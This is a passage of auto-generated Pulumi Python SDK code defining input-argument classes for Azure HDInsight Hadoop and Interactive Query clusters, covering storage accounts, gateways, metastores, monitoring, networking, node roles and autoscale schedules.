:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class HadoopClusterStorageAccountGen2Args:
def __init__(__self__, *,
filesystem_id: pulumi.Input[str],
is_default: pulumi.Input[bool],
managed_identity_resource_id: pulumi.Input[str],
storage_resource_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "filesystem_id", filesystem_id)
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "managed_identity_resource_id", managed_identity_resource_id)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
@property
@pulumi.getter(name="filesystemId")
def filesystem_id(self) -> pulumi.Input[str]:
"""
The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "filesystem_id")
@filesystem_id.setter
def filesystem_id(self, value: pulumi.Input[str]):
pulumi.set(self, "filesystem_id", value)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="managedIdentityResourceId")
def managed_identity_resource_id(self) -> pulumi.Input[str]:
"""
The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "managed_identity_resource_id")
@managed_identity_resource_id.setter
def managed_identity_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_identity_resource_id", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class InteractiveQueryClusterComponentVersionArgs:
def __init__(__self__, *,
interactive_hive: pulumi.Input[str]):
pulumi.set(__self__, "interactive_hive", interactive_hive)
@property
@pulumi.getter(name="interactiveHive")
def interactive_hive(self) -> pulumi.Input[str]:
return pulumi.get(self, "interactive_hive")
@interactive_hive.setter
def interactive_hive(self, value: pulumi.Input[str]):
pulumi.set(self, "interactive_hive", value)
@pulumi.input_type
class InteractiveQueryClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresArgs:
def __init__(__self__, *,
ambari: Optional[pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs']] = None,
hive: Optional[pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs']] = None,
oozie: Optional[pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs']] = None):
"""
:param pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
:param pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
:param pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
"""
if ambari is not None:
pulumi.set(__self__, "ambari", ambari)
if hive is not None:
pulumi.set(__self__, "hive", hive)
if oozie is not None:
pulumi.set(__self__, "oozie", oozie)
@property
@pulumi.getter
def ambari(self) -> Optional[pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs']]:
"""
An `ambari` block as defined below.
"""
return pulumi.get(self, "ambari")
@ambari.setter
def ambari(self, value: Optional[pulumi.Input['InteractiveQueryClusterMetastoresAmbariArgs']]):
pulumi.set(self, "ambari", value)
@property
@pulumi.getter
def hive(self) -> Optional[pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs']]:
"""
A `hive` block as defined below.
"""
return pulumi.get(self, "hive")
@hive.setter
def hive(self, value: Optional[pulumi.Input['InteractiveQueryClusterMetastoresHiveArgs']]):
pulumi.set(self, "hive", value)
@property
@pulumi.getter
def oozie(self) -> Optional[pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs']]:
"""
An `oozie` block as defined below.
"""
return pulumi.get(self, "oozie")
@oozie.setter
def oozie(self, value: Optional[pulumi.Input['InteractiveQueryClusterMetastoresOozieArgs']]):
pulumi.set(self, "oozie", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresAmbariArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresHiveArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class InteractiveQueryClusterMetastoresOozieArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class InteractiveQueryClusterMonitorArgs:
def __init__(__self__, *,
log_analytics_workspace_id: pulumi.Input[str],
primary_key: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
:param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
"""
pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
pulumi.set(__self__, "primary_key", primary_key)
@property
@pulumi.getter(name="logAnalyticsWorkspaceId")
def log_analytics_workspace_id(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace ID.
"""
return pulumi.get(self, "log_analytics_workspace_id")
@log_analytics_workspace_id.setter
def log_analytics_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "log_analytics_workspace_id", value)
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace key.
"""
return pulumi.get(self, "primary_key")
@primary_key.setter
def primary_key(self, value: pulumi.Input[str]):
pulumi.set(self, "primary_key", value)
@pulumi.input_type
class InteractiveQueryClusterNetworkArgs:
def __init__(__self__, *,
connection_direction: Optional[pulumi.Input[str]] = None,
private_link_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] connection_direction: The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
:param pulumi.Input[bool] private_link_enabled: Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
"""
if connection_direction is not None:
pulumi.set(__self__, "connection_direction", connection_direction)
if private_link_enabled is not None:
pulumi.set(__self__, "private_link_enabled", private_link_enabled)
@property
@pulumi.getter(name="connectionDirection")
def connection_direction(self) -> Optional[pulumi.Input[str]]:
"""
The direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "connection_direction")
@connection_direction.setter
def connection_direction(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_direction", value)
@property
@pulumi.getter(name="privateLinkEnabled")
def private_link_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "private_link_enabled")
@private_link_enabled.setter
def private_link_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "private_link_enabled", value)
@pulumi.input_type
class InteractiveQueryClusterRolesArgs:
def __init__(__self__, *,
head_node: pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs']):
"""
:param pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
"""
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['InteractiveQueryClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['InteractiveQueryClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['InteractiveQueryClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class InteractiveQueryClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
autoscale: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs']] = None,
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if autoscale is not None:
pulumi.set(__self__, "autoscale", autoscale)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def autoscale(self) -> Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs']]:
"""
A `autoscale` block as defined below.
"""
return pulumi.get(self, "autoscale")
@autoscale.setter
def autoscale(self, value: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs']]):
pulumi.set(self, "autoscale", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleArgs:
def __init__(__self__, *,
capacity: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs']] = None,
recurrence: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
"""
:param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs'] capacity: A `capacity` block as defined below.
:param pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
"""
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if recurrence is not None:
pulumi.set(__self__, "recurrence", recurrence)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs']]:
"""
A `capacity` block as defined below.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs']]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def recurrence(self) -> Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
"""
A `recurrence` block as defined below.
"""
return pulumi.get(self, "recurrence")
@recurrence.setter
def recurrence(self, value: Optional[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
pulumi.set(self, "recurrence", value)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleCapacityArgs:
def __init__(__self__, *,
max_instance_count: pulumi.Input[int],
min_instance_count: pulumi.Input[int]):
"""
:param pulumi.Input[int] max_instance_count: The maximum number of worker nodes to autoscale to based on the cluster's activity.
:param pulumi.Input[int] min_instance_count: The minimum number of worker nodes to autoscale to based on the cluster's activity.
"""
pulumi.set(__self__, "max_instance_count", max_instance_count)
pulumi.set(__self__, "min_instance_count", min_instance_count)
@property
@pulumi.getter(name="maxInstanceCount")
def max_instance_count(self) -> pulumi.Input[int]:
"""
The maximum number of worker nodes to autoscale to based on the cluster's activity.
"""
return pulumi.get(self, "max_instance_count")
@max_instance_count.setter
def max_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "max_instance_count", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> pulumi.Input[int]:
"""
The minimum number of worker nodes to autoscale to based on the cluster's activity.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
def __init__(__self__, *,
schedules: pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
timezone: pulumi.Input[str]):
"""
:param pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
:param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
"""
pulumi.set(__self__, "schedules", schedules)
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
"""
A list of `schedule` blocks as defined below.
"""
return pulumi.get(self, "schedules")
@schedules.setter
def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['InteractiveQueryClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
pulumi.set(self, "schedules", value)
@property
@pulumi.getter
def timezone(self) -> pulumi.Input[str]:
"""
The time zone for the autoscale schedule times.
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: pulumi.Input[str]):
pulumi.set(self, "timezone", value)
